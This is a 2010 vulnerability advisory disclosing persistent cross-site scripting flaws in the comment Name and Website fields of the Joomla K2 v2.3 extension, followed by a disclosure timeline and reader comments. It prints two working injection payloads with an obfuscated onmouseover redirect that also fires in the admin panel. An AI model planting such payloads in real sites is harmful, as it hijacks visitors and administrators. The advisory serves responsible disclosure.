Saturday, 11 September 2010 12:08
K2 v2.3, the popular Joomla! CCK extension, suffers from persistent XSS vulnerabilities in its comment facility.
Comment "Name" Field Persistent XSS
" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)
Comment "Website" Field Persistent XSS
" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)
NOTE: also executes in admin!
Timeline
- Vulnerabilities Discovered: 24 August 2010
- Vendor Notified: 24 August 2010
- Vendor Response: 25 August 2010
- Update Available: ... 2010
- Disclosure: 11 September 2010
Last Updated on Thursday, 30 September 2010 17:34
Comments (6)
Add your comment
Featured Extensions
|
$3.00
FREE You Save: $3.00 |
$1.00
FREE You Save: $1.00 |
$10.00
FREE You Save: $10.00 |
$3.00
FREE You Save: $3.00 |
Latest Articles
Most Popular
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.




Additionally, the above vulnerability is only possible only if you allow comment editing permissions to members in your site, usually "trusted" people.
Thanks
I just tested the latest SVN and you managed to get the frontend XSS, however the Comments panel in administrator is still vulnerable to the Website field XSS...
Thanks Jeff ;)